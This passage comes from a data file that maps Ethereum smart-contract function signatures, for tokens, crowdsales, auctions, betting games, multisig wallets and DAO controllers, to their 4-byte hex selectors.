"setParents(uint256,uint256,uint256)": "0x2a952b4b", "add2Auction(address,uint256,uint256,uint256,uint256,uint256)": "0xaee8a3bd", "add2MarketPlace(address,uint256,uint256,uint256)": "0x11da9598", "addRandomFight2Death(address,uint256)": "0xda2aa615", "addSelctFight2Death(address,uint256,uint256,uint256,uint256)": "0x3e182d3f", "getNewGens(address,uint256)": "0x4ae3164d", "addDragon(address,uint256,uint256)": "0xad4e2f77", "addHistory(uint256,address,uint8)": "0x0e41c63b", "getHistory(uint256,uint256)": "0x6906679b", "itemHistoryOf(uint256)": "0xc7dddf0f", "addressHistoryOf(uint256)": "0x86efb94e", "historyCountOf()": "0x5fc9e75e", "sha(uint128,bytes32)": "0x01bc43a0", "getRandom(uint128,uint256)": "0x09f8477a", "calculateWin()": "0xac7f0c48", "buyCountry(uint256)": "0x1a65e283", "bet(bool)": "0x523afb0d", "toggleFeatured()": "0xfd367f7d", "updateResult()": "0x80ebb08e", "__resolve(uint256)": "0xd06301d3", "setContracts(address,address,address,address)": "0xbf989b6e", "Controller(address,address,address,address)": "0x61a215e4", "DAOToken(string,string,uint256)": "0x2f46ba70", "AddLocation(string)": "0xb5fd76bb", "discount()": "0x6b6f4a9d", "Discount()": "0xc63ccb3b", "swapTop(uint256)": "0xa5e5e034", "stackOffset(uint256)": "0xb957b886", "isEmpty()": "0x681fe70c", "donate(uint256,string)": "0x8d59d1f1", "test5_searchAcrossNodes()": "0xf9c1437e", "test4_searchSameNode()": "0x3614ac6f", "test3_search()": "0xc0ea6ff5", "test2_verlappingIntervalNewNode()": "0x562c9dfa", "test1_overlappingIntervalSameNode()": "0x5b7a78c8", "test0_firstInterval()": "0x674c20a1", "setVault(address,address)": "0x714ccf7b", "setUrl(address,uint256,string)": "0xd7397a72", "createClone(address,string,string,string,address,uint256)": "0xfd906c0f", "startWeek(address,uint8)": "0x552f1270", "makePayment(address,uint256,string)": "0x9d9db392", "deployMeDao(string)": "0x2eecbc7f", "comments2()": "0x85d45d34", "comments1()": "0x18a6217d", "comments()": "0x25c843b9", "subBalance(uint256)": "0x00a8efc7", "addBalance(uint256)": "0xd91921ed", "VendingMachine()": "0x26345de2", "abstractFunc()": "0x3a9407ec", "testInitialBalanceWithNewMySale()": "0x35e83446", "functionReturningValue(bytes32)": "0xdd63f7d0", "fundOwner()": "0x735fb8e0", "adminRefund(address,address)": "0x17749a16", "safebalance(uint256)": "0x109ac462", "_deposit()": "0xabb721ce", "BrancheProportionalCrowdsale(uint256,uint256)": "0x9fd55832", "fetchBlocks(address)": "0xc94e6567", "fetchAllBlocks()": "0xf9660347", "addBlock(string,uint256,string)": "0x8cc50ecd", "GreenChain()": "0x2ad3e8bc", "reveal()": "0xa475b5dd", "MultiBonusCrowdsaleMock()": "0x0ca2f2fd", "STQPreICO2(address,address[])": "0x7965bb86", "getGroupbyIndex(uint256)": "0x7986cbfc", "getGroupManagement(uint256)": "0x0545a03b", "getGroupRates(uint256)": "0xccbb52f5", "getGroupDescription(uint256)": "0xb72314a1", "modifyGroup(uint256,string,string,string,uint256,uint256,uint256,uint256,uint256,bool,uint256)": "0x61f9ca4d", "transferGroupCommune(uint256,address)": "0xf8daa0ee", "transferGroupIntertrade(uint256,address)": "0xa7bc2efd", "createGroup(string,string,string,uint256,uint256,uint256,uint256,uint256,bool)": "0x4d98a6ff", "getMemberWhisper(address)": "0x6bc5b964", "getMember(address)": "0x2ada2596", "deleteMemberOfGroup(address,uint256)": "0xc882acc8", "kickOutGroup(address,uint256)": "0xc3b3c656", "resignFromGroup()": "0xf14bd85d", "makeMemberOfGroup(address,uint256)": "0x7d87e97d", "acceptAtGroup(address,uint256)": "0x46e1bfbb", "joinGroup(uint256)": "0xeed02e4b", "modifyMemberLimits(address,uint256,uint256)": "0xf1e7ae1f", "modifyMember(string,string,string,string)": "0x8c5fb7fb", "creditCommons()": "0x717de52e", "testAliceFooKill()": "0x79cb650f", "testAliceFooSend()": "0x8142a25a", "Bob(address)": "0x0f2004a1", "testFooKill()": "0xe3611578", "testFooSend()": "0x59d2af39", "Alice(address)": "0x63eed1d7", "testTodo()": "0x1b8ab64d", "test1Bob()": "0x8193327b", "test0Alice()": "0x34721e08", "SNTPlaceHolderMock(address,address,address,address)": "0xd4912ab1", "disapproveInternal()": "0xd8c5c6f8", "completeInternal()": "0x17c24891", "approveInternal()": "0x30a3160d", "getAddressesSize()": "0xb96891e5", "getAddresses()": "0xa39fac12", "addInternal(address,address)": "0x881cfeb6", "Processables()": "0x1e30b599", "submitGameResultAndTriggerPayout(uint256)": "0x10ee1910", "submitGameResults(uint256)": "0x9423f443", "makeBet(uint256)": "0x718cc769", "addEmployee(address)": "0xf3cb8c31", "Bet(address,string,uint256)": "0x265cdd88", "ethBalance()": "0x4e6630b0", "inflateActiveSupply(uint256)": "0x04153ac9", "MockController(address,address,address,address)": "0x9500aa12", "downTickTest(address,uint256)": "0xf4807a4d", "_isSchemeRegistered(address,address)": "0x56ff55d1", "removeGlobalConstraintPost(int256,address,int256,address)": "0x879611bb", "removeGlobalConstraintPre(int256,address,int256,address)": "0xb8701689", "getNativeReputation(address)": "0x8da03997", "sendEther(uint256,address,address)": "0x634965da", "genericAction(bytes32[],address)": "0x60351748", "upgradeController(address,address)": "0x42427bf8", "removeGlobalConstraint(int256,address,int256,address)": "0x0e792536", "getVotersAt(uint256,uint256,uint256)": "0x04830ddd", "getVoters(uint256,uint256)": "0x8884b807", "votersCount()": "0x98c07938", "Voting(uint8,address,uint256,uint256)": "0xa67ebf73", "KUYCToken()": "0x9122acd8", "_tokenPurchase(uint256)": "0x8820401a", "DoctorChainToken()": "0x89d2fca3", "_getRate()": "0x94e10784", "DiaToken()": "0xdf47a924", "setUnavailable()": "0xb9843c7c", "culcurateBonusRate()": "0xe0180115", "YamatoCoinCrowdSale()": "0x81a5ad6d", "getPrice(uint40)": "0x7d8f442e", "isAvailable(uint40)": "0x97b3b441", "addCutie(uint40,uint256)": "0x39b2447e", "initialTransfer(address,uint256,uint256)": "0xd0e709b6", "KEDToken()": "0x5f1d7037", "setMinterContract(address)": "0x38478ae7", "ReleaseOfAccount(address,uint256)": "0x0e8bf00e", "PeriodOfAccount(address,uint256)": "0x76385f2a", "MedicayunLink(uint256,string,string)": "0x8ddab515", "Halo3DShrimpFarmer(address)": "0x5a88b15f", "DogCoinCrowdsale(uint256,uint256,uint256,uint256,address)": "0xe91710aa", "_KiwiToken()": "0x319c7748", "Anxxia()": "0xc2e3460d", "DYCOIN()": "0x9eba0196", "systemAddress(address)": "0xbc244fc9", "addIdentity(address)": "0xb9093fc6", "addSystem(address,address)": "0x2ebd632a", "BatanCoin()": "0x36c6a410", "F2UPAY()": "0xa0db844f", "tokenDemo(uint256,string,string,address)": "0x77a6acfb", "UK()": "0x02eef456", "reserveTokensProjectAndFounders()": "0x7ab03c25", "startPreDistribution(uint256,uint256,address,address,address)": "0x585789cd", "getTokensAmount()": "0x62486d42", "_getTokens()": "0xc9102029", "giveMeNILs()": "0x7a0c396d", "_fromNanoNIL(uint256)": "0x76e00ed7", "_toNanoNIL(uint256)": "0x160d5240", "Clost(uint256,string,string,uint256)": "0x58864d04", "RYNote()": "0x2b019692", "BdpControllerHelper(bytes8)": "0xf5adad57", "regionsIsPurchased(uint256)": "0x5786f28c", "regionExists(uint256)": "0x79214878", "calculateSetupAllowedUntil(uint256)": "0xf959300b", "calculateRegionSalePixelPrice(uint256)": "0x977f3b05", "calculateRegionInitialSalePixelPrice(uint256)": "0x568d13eb", "calculateAveragePixelPrice(uint256,uint256)": "0xcf6fcbb0", "calculateMarketPixelPrice(uint256)": "0x179dd216", "calculateCurrentMarketPixelPrice()": "0x7e8bf1cd", "countPurchasedPixels()": "0x373dde4f", "calculateArea(uint256)": "0x46348e0b", "Ethmall(address,address,address,uint256,uint256,uint256)": "0xcc348429", "startTokenVotes(address[15])": "0x8f4ccce8", "GDX()": "0x0d505d54", "Megaton()": "0x761dc416", "setCrowdsaleData(uint256,uint256,uint256)": "0xc2c62562", "SolarDaoTokenCrowdsale(address,address,uint256,uint256,uint256)": "0xb7c940f6", "REEFToken()": "0x4173c27a", "Mjolnir()": "0x0ae870bd", "RewardsGiftToken()": "0xfda76eef", "WalchainToken()": "0x396bf78a", "Tokensale(address,address)": "0x22a47143", "VenusCoin()": "0xd88c5237", "activate_reserve()": "0x42f3f7e0", "Kodobit()": "0x8787f75d", "requireKyc(address[])": "0x8721db89", "lowerSupply(uint256)": "0xc7153816", "TestyTest()": "0x255c8fee", "transferExternalToken(address,address,uint256)": "0x2fbd2432", "transferToMany(address[],uint256[])": "0x7c33ebfd", "clearKyc(address[])": "0x88968bc3", "currentSupply()": "0x771282f6", "sultantoken()": "0x59f9edd0", "toTokens(uint256)": "0x60ca46cd", "CoinoorCrowdsale(address,address,address,address,address,uint256)": "0x691cdb51", "cancelBid()": "0x9435c887", "fillBid()": "0x418939c0", "offerPieceForSale(uint256)": "0xbf36c5b0", "buyPiece()": "0xc01569f9", "setProof(string)": "0x15336f80", "Artwork(bytes32,uint256,string,string,string,uint256,address)": "0xc6a496bf", "newArtwork(bytes32,uint256,string,string,string,uint256)": "0x420c96ea", "getContractCount()": "0x9399869d", "getReferrerReward()": "0xd72ad623", "getReferrer(address)": "0x4a9fefc7", "issuePatrons(address,uint256)": "0x02917f4a", "isFactoryApproved(address)": "0x046ce030", "isSHA256HashRegistered(bytes32)": "0x479a4ae9", "registerArtwork(address,bytes32,uint256,string,string,uint256,address,bool,bool)": "0x21cb1568", "getEthartArtReward()": "0xc3da5153", "getEthartRevenueReward()": "0x2ff59dec", "StableCurrencyToken(uint256,string,string,uint256)": "0x658268c1", "sellMaximumPossibleAmountOfTokens()": "0xb20c9f8b", "BFreeContract()": "0x30188fdf", "Mire()": "0x8c12324a", "manualSendTokens(address,uint256)": "0x04719030", "refundICO()": "0xdb32be98", "recoverLeftoversICO()": "0xead490ad", "hashBetSum()": "0xde469071", "skinContract()": "0xfb98a409", "teamWithdrawalRecipient()": "0x9558e916", "setWinningTeam()": "0xca13b818", "allItemsForSale()": "0xf0d07014", "startingSnailAmount()": "0x580101c8", "isPausedCrowdsale()": "0xc8b43c10", "ledgerWallet()": "0x920bb680", "gemPerMiner()": "0x68b35396", "SGT()": "0x9321cb7d", "currentPendingParticipants()": "0x123b06d5", "numOfJingles()": "0x210ab6af", "_getBuyPrice()": "0xfc252b94", "inMaintainance()": "0xabda35de", "hasOneYearWithdraw()": "0x1aa6e29f", "firstStageMintingDate()": "0x4804e06f", "feeWithdrawn()": "0xf2ec602c", "schema()": "0xf8895cc8", "advisoryTokens()": "0x175beead", "TWO_DAYS()": "0xe2211592", "addressOfERC20OldToken()": "0x08e12ad3", "byuoutActive()": "0xffe57c16", "randomB()": "0x471d0481", "allowingClaimBTC()": "0x24dd24ed", "returnToBuyersContinue()": "0xae90e9f8", "LOSER_LOCK_TIME()": "0x668cf93d", "bonusStage1()": "0x8d0caef5", "loadProfit()": "0xe4a2c6d6", "totalUBetCheckAmounts()": "0x5fbf17ac", "referralLinkRequirement()": "0x75ed5604", "presale_address()": "0xa861baea", "lastStealValue()": "0xafc797a6", "MULTISIG_WALLET_ADDRESS()": "0x3603b0b0", "maxBetsPerBlock()": "0x45261106", "mintAgent()": "0x0d3737b0", "finishPreIcoAndStartIco()": "0xe76eabe5", "UDF_PORTION()": "0xf62f47ab", "RESEARCH_AND_DEVELOPMENT_TOKENS_PERCENT()": "0x8c33a5c4", "totalUnclaimedTokens()": "0x170ad53c", "round3()": "0x00085d25", "lastKnownPropertyAddress()": "0xc8004293", "publicOfferingTokens()": "0x45c35fd5", "FOUNDATION_ADDRESS()": "0xacfd18c6", "coinfabrikAddress()": "0x7565d2eb", "isAllowContribution()": "0xa6145ba2", "TotalTokenSupply()": "0x8a4af069", "isPresaleStarted()": "0x98d6d8ed", "phaseTwoEnd()": "0xf843dad6", "MIN_INVEST_SUPPORT()": "0x72fb6f75", "iniOwner()": "0xbe7c06ba", "isFueled()": "0xb7bc2c84", "contractSendGas()": "0xd1b648cd", "getMHTTotalSupply()": "0x664dcb93", "hodlerTime6M()": "0x42ef4c1a", "icoBonus3()": "0xb412b445", "Group_2()": "0xaecfd412", "bonus_()": "0xb157add3", "iconiqToken()": "0x4f7e7086", "startDatetime()": "0x977615a3", "minInvEth()": "0xd70b6342", "standardGrowthRate()": "0x16985349", "Accept_Payment()": "0xfbe7913f", "ethTokenRatio()": "0x8ac81296", "restrictedWallet()": "0x45dfe7f3", "dropNumber()": "0x4a35035a", "rewardWinner()": "0xfebdb9b8", "weiFromExchange()": "0xca495022", "fiatCost()": "0xfba07791", "TIER3_BONUS()": "0x112227ae", "golemFactory()": "0x16222950", "oracleCallbackGasLimit()": "0x6bd484c4", "littleMonster()": "0xbdd088e9", "migrateTo()": "0x98c6e760", "amountCollected()": "0x332f7acf", "CNDTTokenDeposit()": "0xc8517b48", "poolEthCap()": "0xb1103200", "lastBlock_f17Hash_uint256()": "0x52894449", "TEAM_TOKEN_CAP()": "0xd823eec9", "numberWinner()": "0x9a6a68e9", "KITTY_BURN_LIMIT()": "0x437b1a1d", "priceUpdateAddress()": "0x9d8f4c27", "publicSupply()": "0x5e84d723", "bitcoin_ratio()": "0xb2c7c90d", "approval()": "0x39788bc8", "emission()": "0x827c049e", "FOUNDER_AMOUNT()": "0x1e4092e5", "seedAndPresaleTokenIssuedTotal()": "0x6269420e", "buyoutsEnabledFromTimestamp()": "0xdd7b3e97", "administratorsLength()": "0x81c9786c", "minEtherForAccounts()": "0xd3119dc0", "endTimeOne()": "0xe5e1a202", "poolAmount()": "0xa693600b", "IcoMessage()": "0x26741c88", "PHASE_3_PRICE()": "0x3f1e600a", "callSoftCap()": "0xe81dd181", "WINNER_SHARE()": "0xdbe3010c", "lastPlayed()": "0xc5339132", "votersLen()": "0xcfd94b01", "InterfaceId_ERC721Enumerable()": "0x63365651", "marketTokenCreated()": "0xfd6dd889", "GAME_POOL_INIT()": "0x6ec40f9e", "ethRateURL()": "0x86d3f4b7", "getBylawsMilestoneMinPostponing()": "0x851a33e9", "getInviteePIDs()": "0x4e926eab", "complianceContract()": "0xb2a2a4e2", "icoDiscountPercentageLevel1()": "0x238c5b06", "_controller()": "0xdd3f9526", "PRICE_RATE_LAST()": "0x0dbf19cb", "gamePlayedStatus()": "0x5a470b65", "oraclizeContract()": "0x53dad947", "poolPresale()": "0xc302f747", "PreviousTime()": "0x655f8294", "SendTokens()": "0xfc836563", "numPositionsExpired()": "0xa23281e6", "numberImmortals()": "0x905a90fe", "minMargin()": "0x39c294be", "lastBlock_a10Hash_uint256()": "0x25696308", "CROWDSALE_SUPPLY()": "0x56ad9f57", "enforceAddressMatch()": "0x8722d4d9", "getTSTTokenAddress()": "0x407c554a", "SQUIRREL_BOOST()": "0x56afeed6", "angelCurrentAmount()": "0x8633497f", "SCORE_UNITARY_SLASH()": "0x747bcd72", "teamPoolInstant()": "0x78d9b048", "unlockTimeStamp()": "0x05aaee1f", "MIN_SITE_ID()": "0xaddb246b", "DOWN_winRate()": "0x09801707", "DisableSuicide()": "0x42ce0555", "reservingStep()": "0xa1920f36", "totalUSD()": "0xa3ae88a0", "get_stats()": "0x61837e41", "isCharged()": "0x17d9c090", "startblock()": "0x0f7875c6", "STAGE_THREE_TIME_END()": "0xf514f0f9", "kycManagerWallet()": "0x45a37bd6", "ethRateExpiration()": "0xe1948e44", "sT2()": "0xee1a4b5a", "PreSaleSold()": "0x9bf9cd26", "oneTokenInWei()": "0x84e3ac94", "accountS()": "0x4b702afa", "PVE_BATTLE()": "0xf80d9e58", "game()": "0xc3fe3e28", "sigDestinationApproveAndCall()": "0xe797496b", "requiredEvidence()": "0x84d6bd43", "secondsBetweenReadings()": "0x26866160", "preSaleCloseTime()": "0xc262a33b", "nextDisbursement()": "0xb2401e1e", "soldForThird()": "0x833ea306", "countTickets()": "0x049fb520", "mainSaleTokenWallet()": "0x3f9cbd65", "newOwnerAPI()": "0xfbaeac89", "sellScale()": "0x32e991cf", "tokenCapForThirdMainStage()": "0x6317cc5b", "qtAccount()": "0x4a1a27a8", "PreSaleLimit()": "0xe6514de2", "signupFee()": "0xf3463272", "difficulty()": "0x19cae462", "PRIMARY_START_PRICE()": "0x497aed49", "_premine()": "0x08daaf4a", "DistributionSale()": "0xb144a4d8", "stampCreatedCount()": "0xac3fc432", "MULTI_SIG()": "0x51cc391d", "totalAirDropToken()": "0xdcaf391e", "sh_doAgree()": "0x57f47bf9", "icoInvestmentsCount()": "0x996f677b", "opmAddress()": "0xdc31e473", "maximumPurchaseFraction()": "0xea05667a", "hardParticipationCap()": "0x65b9e37d", "minimumTokens()": "0x4056f8a8", "maxTokenSupplyICOEND()": "0x1dbde6c7", "get_shares()": "0xf8bdc9dd", "incentiveDistributionDate()": "0xf898e574", "TOKEN_RESERVE1_CAP()": "0x8945a8af", "prepareForRefund()": "0x62c3dd5a", "aum()": "0x0ab51bac", "tokensSelling()": "0x77dc6ac7", "minMaxBuyETH()": "0x2a77f2b7", "ecosystemReserve()": "0x6071eb5c", "Tokens_Per_Dollar()": "0xb2a8ff45", "ethSaver()": "0x3c1f1cb7", "newExchange()": "0x0380fd03", "cappedSaleStartTime()": "0x015f32f9", "freezeTransferTime()": "0x2b8a36e0", "lastBlock_v13Hash_uint256()": "0x4b376513", "VLTMultisig()": "0x4fdf8a03", "REPLACES()": "0xa1b6d4ae", "inviteCollateralizer()": "0x1870082d", "wa()": "0x7b9daba8", "unLockTime()": "0xfacc7905", "day2Start()": "0x21914e29", "teamAlloacting()": "0xa79a3c30", "withdrawRemainingRtc()": "0xf6a58558", "checkForPayout()": "0x40d8c74f", "curMax()": "0x29d368e3", "_maximumBuy()": "0x7fd2304f", "ADVISORS_ADDR()": "0xb6f7bfcd", "receivedWais()": "0x66b7d5c6", "TDEEndDate()": "0x4bfa0d11", "hardCapEther()": "0xd5f1e8d8", "maxBuyRateInPrecision()": "0xe255d5ad", "_updateLockUpAmountOf(address,address)": "0x974ee3bb", "lockUpAmountOf(address)": "0x1f470b14", "SpindleToken()": "0x27da0078", "setLockTokensAddress(address)": "0x14177dbf", "delTransferWhiteList(address)": "0x7fb5d847", "addTransferWhiteList(address)": "0x438652e0", "withdrawForMany(address[])": "0x819c5773", "withdrawFrom(address)": "0xde1b0486", "EtherusToken(address)": "0x89c18b48", "transferAndPay(address,uint256,bytes)": "0xd8615e5b", "_createGirl(string,address,uint256)": "0x2dacdaf7", "getGirl(uint256)": "0x054a8c02", "createContractGirl(string)": "0x350bb144", "EtherGirls()": "0x17c208a0", "CUZ()": "0x8c676aaa", "consume(address,uint256)": "0x224b5c72", "SportX()": "0x6da44d61", "updateStats(uint256,uint256)": "0xc4e11c91", "doPurchase(uint256,uint256,uint256,address,address,uint256)": "0x86beaece", "btcPurchase(address,uint256)": "0x221b30df", "finalize(address,address,address,address)": "0x2aaa308e", "setBtcUsdRate(uint256)": "0x1f92f6b7", "setWeiUsdRate(uint256)": "0x628d5ef1", "TokenSale(uint256,uint256,address,uint256)": "0x724693ce", "setConfiguration(uint256,uint256,uint256,int256)": "0x39c2f6a0", "order_buy(address,uint256)": "0x76f86e18", "order_sell(uint256,uint256)": "0xd858b5c8", "get_orders_sell_amount(address)": "0xea10d246", "orders_sell_total()": "0xfc9937e5", "change_ico_finish(uint256)": "0xe696fd64", "change_ico_start(uint256)": "0x9a42adb3", "change_pre_ico_start(uint256)": "0x47afa4e4", "change_p5(uint256)": "0x0f85751e", "change_p4(uint256)": "0xaf7d5ebe", "change_p3(uint256)": "0xc3681e3d", "change_p2(uint256)": "0xdab0537b", "change_p1(uint256)": "0xfc8791c0", "change_coef(uint256)": "0xb4781f63", "DELTA_Token()": "0x5685f6bd", "configureMigrate(bool,address)": "0x90ab54dc", "EOCSToken(uint256,string,string)": "0xbb2f3228", "setDevfee(uint256)": "0x6dd2bfca", "getRandom(address)": "0x66f83e91", "playTypes(uint256)": "0xcacfd8e9", "setCalleeContract(address)": "0xee76ac07", "setBetLimit(uint256,uint256)": "0x5884afe1", "soccerGo()": "0x97db0a7b", "SetLimit(uint256,uint256)": "0x00de8393", "BuckyCoin()": "0xbf843aed", "allowAddress(address,bool)": "0x4edc689d", "IPayX()": "0x7471ea81", "OtxToken()": "0xab70bba7", "setHBT(uint256)": "0x6ba6984c", "HawkToken(uint256,uint256)": "0x28df3707", "updateCrowdsaleAddress(address)": "0xea112b6c", "iPay()": "0x49da847b", "ABL(address,address)": "0x01068767", "ShoreCoin(uint256,string,uint8,string)": "0xcbeb5749", "crowdsaleRunning()": "0xbb50c67a", "MatreXaCrowdsale(uint256,uint256[],uint256[],uint256,uint256,uint256,uint256)": "0xa29aaad6", "setAllowTransferTimestamp(uint256)": "0xbadfa573", "burnReward(uint256)": "0xb5e8cf02", "setsalesdeadline(uint256)": "0x817246cf", "RECFCO(address,address)": "0x5158c829", "ETE()": "0xba7d0b3c", "CMCLToken(uint256,string,string,address)": "0x522637e7", "Token20(uint256,string,string)": "0x9dfd1de3", "VLUToken()": "0x486e97ad", "JudgmentCoin()": "0xacefb7bd", "claim(address,address)": "0x21c0b342", "amendRetention(uint256,uint256)": "0xd274fa91", "amendFee(uint256)": "0x03bc6d0d", "selfLock()": "0xd1e7e81f", "OysterShell()": "0x7c13b331", "_transferAndLock(address,address,uint256,uint256)": "0xcd395a96", "setMultiple(uint256)": "0xab89f870", "distributeToken(address,address,uint256)": "0xc82f8d9e", "ZcnoxToken()": "0x8b1acf9e", "mintInCurrPeriodCount()": "0xae5adac7", "mintInPeriodCount(uint256)": "0x19e5d0cb", "hashVerification(bytes32)": "0x70387c59", "idVerification(address,address,uint256)": "0x61806891", "storeDoi(bytes32,bytes32)": "0xe38da1a1", "storeHash(bytes32)": "0x7fe88885", "storeId(address,address,uint256)": "0x2655dd0b", "allowanceSubId(address,uint256,uint256)": "0x7b6c0492", "allowanceSub(address,uint256)": "0x95b4b88d", "allowanceAdd(address,uint256)": "0x94ae7ac3", "tokentBalance(address,address)": "0xf04be582", "tokenTotalSupply()": "0xf7abab9e", "initMinting()": "0x00dee43f", "SUTokenContract()": "0xb3074b8a", "callWithdraw()": "0xdad901be", "requestArbitration(bytes32)": "0x2317880c", "setRealityCheck(address)": "0x7003433a", "claimMultipleAndWithdrawBalance(bytes32[],uint256[],bytes32[],address[],uint256[],bytes32[])": "0x28828b1e", "_processHistoryItem(bytes32,bytes32,uint256,address,address,uint256,bytes32,bool)": "0x86047946", "_verifyHistoryInputOrRevert(bytes32,bytes32,bytes32,uint256,address)": "0x30d4d8d0", "_payPayee(bytes32,address,uint256)": "0x20af0841", "claimWinnings(bytes32,bytes32[],address[],uint256[],bytes32[])": "0x1101a0fd", "discount(uint256,uint256,uint256,uint256,uint256)": "0xe1d5988e", "isMaySale()": "0x6eb2a749", "isCosmosSale()": "0x686e2284", "isWMSale()": "0xfa368e6d", "isPiSale()": "0x700d3230", "isFemaleSale()": "0xfed09b2f", "isSecondRound()": "0x8e7418cb", "isFirstRound()": "0x805e99e0", "setKYCFull(address[])": "0xb22b2b66", "setKYCLimited(address[])": "0x2a776e3d", "setFemaleBonus(address[])": "0x2984a077", "setWhiteList(address[])": "0x775b9c13", "setParams(address[],uint256)": "0x1958ccb1", "massPay(address[],uint256)": "0xfdd5828f", "setICOManager(address)": "0x9c69763b", "UNICToken()": "0xa1f43f40", "VoiceCoin()": "0x57a2e60c", "checkGoal()": "0x4c4870c6", "ExperimentalPreICO(address,uint256,uint256,uint256,uint256,uint256,address)": "0xdc5df3fd", "initial()": "0xbb806dc9", "BiquToken(uint256,string,string)": "0xae353131", "ETIC()": "0x2b726758", "SMEToken(uint256,uint256,uint256,uint256)": "0x6ab22536", "clearSmet()": "0xa05693c6", "getFunder(uint256)": "0xd7b4750c", "closeOption(address[3],uint256[3])": "0x6674bfaf", "exerciseOption(address[3],uint256[3])": "0xf47f5921", "cancelOptionOrder(address[3],uint256[3],bool)": "0x0160e2f6", "fillOptionOrder(address[3],uint256[3],uint256[2],address,bool,uint96,uint8,bytes32[2])": "0x9f98a45a", "payForOption(address,address,address,uint256)": "0xf92a373b", "getOptionState(address[3],uint256[3])": "0x708a4947", "getOrderHash(bytes32,uint256[2],address,bool,uint96)": "0x40fa368c", "getOptionHash(address[3],uint256[3])": "0x570e6729", "transferUserToUser(address,address,address,uint256)": "0x4dd9e437", "BACTest1Token(uint256,string,uint8,string)": "0x4000d5c3", "_editPersonalNote(string,uint256)": "0xbcbd3bcd", "_createKT(string)": "0x7a3dae68", "FUT5()": "0x5d831ca1", "updateTokenPoolAddress(address)": "0x412ec94f", "updateTokenAddress(address)": "0x6691461a", "updateWallet(address)": "0x848b86e3", "MANETokenPartnerCrowdsale(uint256,uint256,address,address,address,address,address)": "0x2b7c3138", "EighthContinentSocialMarketplaceToken(uint256,string,uint8,string)": "0x9783bef4", "YankeesOrioles48()": "0x2d9525d6", "COSSDemo()": "0xb2cb3e93", "Administration()": "0xf88573c8", "AIOS()": "0x43b3181c", "payCeo()": "0x98a26497", "ERC20Token(uint256,string,string)": "0xe0cf72e1", "BarterCoin()": "0xcf5d4e4d", "Bulletin()": "0x18bbedf4", "DesingCoin()": "0x0ecdbfd4", "getGamblerBet(address,uint256)": "0x0362d1f6", "getGamesByDay(uint256)": "0xfb11613e", "getGamblerGameIds(address)": "0xe2bc1971", "claimPrize(uint256)": "0xd7098154", "revertBet(uint256)": "0x11bdfe19", "betFreeGame(uint256,uint8)": "0x47b40ba2", "betGame(uint256,uint8)": "0x912bcb79", "addBet(uint256,uint8,uint256,bool)": "0xfbe2e125", "setGameResult(uint256,uint8)": "0x00387733", "addGame(string,string,uint256,uint256)": "0x98880043", "addFreeBet(address,uint256)": "0xc422ed19", "hasBet(uint256)": "0xdf5e3569", "reclaimFundMultiple(address[])": "0x79905753", "reclaimFund(address)": "0x3e8786a1", "removeLockMultiple(address[])": "0xfcc1cc9b", "systemClaimAirdropMultiple(address[])": "0xb3e99b77", "icoThresholdReached()": "0xe3fe9740", "VikkyToken()": "0x873a5690", "party()": "0x354284f2", "setCoinInfo(address)": "0x4a169e4b", "RechargeMain(address)": "0x24619da7", "openBoxes(uint256[])": "0x3e52d5c6", "isBoxItemId(uint256)": "0x210e734c", "getBoxes(address)": "0xa731f31a", "setVCX(address,address,uint256)": "0xf1317352", "setVRC(address,address,uint256)": "0x56ddbe7a", "contributorsCount()": "0x7569b3d7", "sendTokens(uint256,address,bool)": "0x4b997d9a", "createMechETH(uint256,address)": "0x9d89add1", "createMechVRC(uint256,address)": "0x52b7fddb", "createMechBTC(uint256,address)": "0xb84ebd7f", "createVCXVault(uint256,address)": "0x73741171", "createSaiFoundersEdition(uint256,address)": "0x10fb52bf", "createSaiCollectorsEdition(uint256,address)": "0x10402040", "createSaiLimitedEdition(uint256,address)": "0x6429161b", "tokenInfo(uint256)": "0xcc33c875", "tokensInfoOfOwner(address)": "0x8b157515", "getMetadata(uint256,string)": "0xcb4799f2", "SEXNToken()": "0xa04da725", "_initialize()": "0x80ae4ebc", "relaseLock()": "0x84cdbb4b", "_releasableAmount(address,uint256)": "0xe0778211", "distribute(address,uint256,uint256,uint256)": "0x99aba8e3", "_distribute(address,uint256,uint256,uint256)": "0x200b8951", "_caluLocktime(uint8)": "0xe39c742a", "setSaleInfo(uint8,uint256,uint256,uint256,uint256)": "0x0febb8b7", "getLockTime(address)": "0xaa31aee8", "getRemainingPreSalesAmount()": "0x106858cb", "removeApprover(address)": "0x6cf4c88f", "addApprover(address)": "0xb646c194", "removeRequester(address)": "0x1107e77c", "addRequester(address)": "0xe4d609cc", "getRewardRate(address,address)": "0xaaed2c3d", "getTotalApprovers()": "0x1d747131", "getRewardTokenCount()": "0x82e5d073", "getTotalTokens(address)": "0xaeadbe24", "transferRewards(address,uint256,uint256)": "0xcd5f49d5", "approvedRewardSources(address)": "0xea996c9c", "requesters(address)": "0xd6f8307f", "approvers(uint256)": "0xd3650fb8", "referrers(address)": "0x4a3b68cc", "rewardSources(uint256)": "0x35566ff0", "referralBonusRate()": "0x1f312375", "orderFills(bytes32)": "0xf7213db6", "inactivityReleasePeriod()": "0xf31174ee", "trade(uint256[8],address[4],uint8[2],bytes32[4])": "0xef343588", "setInactivityReleasePeriod(uint256)": "0xdd93c74a", "traded(bytes32)": "0xd5813323", "invalidateOrdersBefore(address,uint256)": "0xb12de559", "invalidOrder(address)": "0x83dbb27b", "feeAccount()": "0x65e17c9d", "tokens(address,address)": "0x508493bc", "setAdmin(address,bool)": "0x4b0bddd2", "admins(address)": "0x429b62e5", "withdrawn(bytes32)": "0x3823d66c", "lastActiveTransaction(address)": "0x254dcfe2", "adminWithdraw(address,uint256,address,uint256,uint8,bytes32,bytes32,uint256)": "0x2295115b", "activateSafeMode()": "0xfc0f392d", "safeMode()": "0xabe3219c", "createForwarder()": "0xa68a76cc", "getNextSequenceId()": "0xa0b7967b", "isSigner(address)": "0x7df73e27", "sendMultiSig(address,uint256,bytes,uint256,uint256,bytes)": "0x39125215", "flushForwarderTokens(address,address)": "0x2da03409", "signers(uint256)": "0x2079fb9a", "sendMultiSigToken(address,uint256,address,uint256,uint256,bytes)": "0x0dcd7a6c", "KittyCore()": "0xe7dee968", "SaleClockAuction(address,uint256)": "0x0efafc03", "SiringClockAuction(address,uint256)": "0xce818ed5", "ClockAuction(address,uint256)": "0xc9410b76", "_computeCut(uint256)": "0x1c5412f7", "_computeCurrentPrice(uint256,uint256,uint256,uint256)": "0xcb92bfa1", "_removeAuction(uint256)": "0xfdd3e3ff", "_bid(uint256,uint256)": "0x7c3d30fd", "_cancelAuction(uint256,address)": "0x07e669c3", "_escrow(address,uint256)": "0x12ac9b46", 